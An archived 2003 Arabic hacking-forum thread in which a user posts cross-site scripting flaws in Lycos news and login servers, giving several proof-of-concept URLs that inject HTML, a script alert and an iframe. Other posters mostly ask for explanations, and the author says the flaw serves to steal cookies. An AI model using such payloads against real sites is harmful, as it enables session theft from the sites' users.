Lycos Authenticating Systems and Lycos News Server Vulnerabilities [الأرشيف] - .:: منتديات العاصفة - اول منتدى عربي متخصص في التقنية والحماية ::.

مشاهدة النسخة كاملة : Lycos Authenticating Systems and Lycos News Server Vulnerabilities

القرصان

15-06-2003, 03:07

ثغرة في News Server للايكوس

SUMMARY
تسمح للهكر البعيد أن يعدل في الشفرة أو الكود التي تتولّى عمليّة الدّخول ................"يدوياً".
A cross site security vulnerability has been discovered in Lycos's
Authentication servers. The vulnerability allows remote attacker to inject
code into the form that handles the login process.

DETAILS

Examples: أمثلة:
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
H1>xss in Lycos WebSites</h1>

http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
script>alert(document.&@#&@#&@#&@#&@#&@#);</script>

http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417"><
iframe></iframe>

http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">< h1>XSS in Lycos
Authenticating Servers</h1>< a href="

http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><
script>alert(document.&@#&@#&@#&@#&@#&@#);</script>

*********************
*****مع تحيات*****
القرصــــــ|4|ــــــان
*********************

HackTheM

15-06-2003, 05:19

شرح بليز:confused:

HoMLeS

15-06-2003, 09:22

الى الأماااااااااام ياقرصان ومشكور ويعطيك العافيه اخوي ماقصرت

wassem

13-07-2003, 09:33

شرح اذا ممكن وكيف نبحث على هذه الثغرة

Smart c0d3r

14-07-2003, 12:26

مشكور جدا والثغرة حسب ظني واضحة ولا ادري على الباقي

بس هي أوامر تضيفها على الموقع وتعدل في النظام وبس باختصار

وانشا الله يشرحها لكم القرصان افضل لانه صاحبها

تحياتي

مُجَاهِد

06-08-2003, 09:11

كاتب الرسالة الأصلية : HoMLeS

الى الأماااااااااام ياقرصان ومشكور ويعطيك العافيه اخوي ماقصرت

القرصان

31-08-2003, 12:12

XSS ماهي وكيف الإستفادة منها ؟؟؟؟

قريباً بإذن الله

|4|

العاصف99

08-09-2003, 05:03

ممكن شرح.... ارجوووكم

smart..smart

06-10-2003, 08:39

الموقع أصبح أستعراض ثقافه وسعة معلومات بين الهكرز المحترفين والمبتدأين راحوا فيها يعني لو شرح مفصل كان سويت فينا معروف , بس للأسف كل المواضيع بالطريقه هذي وكل المنتديات العربيه بالطريقه هذي , وتجي تسأل الواحد والا تستفسر ولا حد معبرك , سبحان الله بعكس المنتديات الأجنبيه شرح بالتفصيل الممل وجواب لكل سؤال ,
لا استغراب اذا سبقونا وتقدمونا بكل شي .
هذا عتاب لكل منتدياتنا العربيه , والناس الفاهمه في الأختراقات .
على العموم شكراً على الموضوع .

القرصان

07-10-2003, 06:23

وكلامك مش صحيح أخوي بالعكس ماقصدت إلي تقوله
أنا وضعت الثغرة مع امثلة وهي ثغرة مش قوية بس لسرقة ملفات الكوكيز وأنا سويت مستند عن هذا النوع من الثغرات وهي ثغرات XSS

راجع هذا المستند
http://www.3asfh.com/vb/showthread.php?s=&threadid=4155